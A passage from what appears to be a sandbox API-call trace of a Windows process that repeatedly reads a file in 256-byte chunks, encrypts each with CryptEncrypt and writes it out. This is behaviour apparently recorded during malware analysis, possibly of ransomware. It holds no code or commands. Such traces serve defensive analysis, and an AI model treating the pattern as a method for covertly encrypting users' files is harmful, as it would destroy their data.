out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.604] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.604] GetLastError () returned 0x0 [0153.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.604] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.604] GetLastError () returned 0x0 [0153.604] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.604] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.605] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.605] GetLastError () returned 0x0 [0153.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.605] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.605] GetLastError () returned 0x0 [0153.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.605] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.605] GetLastError () returned 0x0 [0153.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.605] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.605] GetLastError () returned 0x0 [0153.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.605] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.605] GetLastError () returned 0x0 [0153.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.605] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.605] GetLastError () returned 0x0 [0153.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.606] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.606] GetLastError () returned 0x0 [0153.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.606] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.606] GetLastError () returned 0x0 [0153.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.606] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.606] GetLastError () returned 0x0 [0153.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.606] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.606] GetLastError () returned 0x0 [0153.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.606] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.606] GetLastError () returned 0x0 [0153.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.606] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.606] GetLastError () returned 0x0 [0153.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.606] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.606] GetLastError () returned 0x0 [0153.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.607] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.607] GetLastError () returned 0x0 [0153.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.607] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.607] GetLastError () returned 0x0 [0153.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.607] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.607] GetLastError () returned 0x0 [0153.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.607] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.607] GetLastError () returned 0x0 [0153.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.607] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.607] GetLastError () returned 0x0 [0153.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.607] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.607] GetLastError () returned 0x0 [0153.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.608] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.608] GetLastError () returned 0x0 [0153.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.608] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.608] GetLastError () returned 0x0 [0153.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.608] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.608] GetLastError () returned 0x0 [0153.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.608] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.608] GetLastError () returned 0x0 [0153.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.608] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.608] GetLastError () returned 0x0 [0153.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.608] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.608] GetLastError () returned 0x0 [0153.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.609] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.609] GetLastError () returned 0x0 [0153.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.609] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.609] GetLastError () returned 0x0 [0153.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.609] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.609] GetLastError () returned 0x0 [0153.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.609] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.609] GetLastError () returned 0x0 [0153.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.609] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.609] GetLastError () returned 0x0 [0153.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, 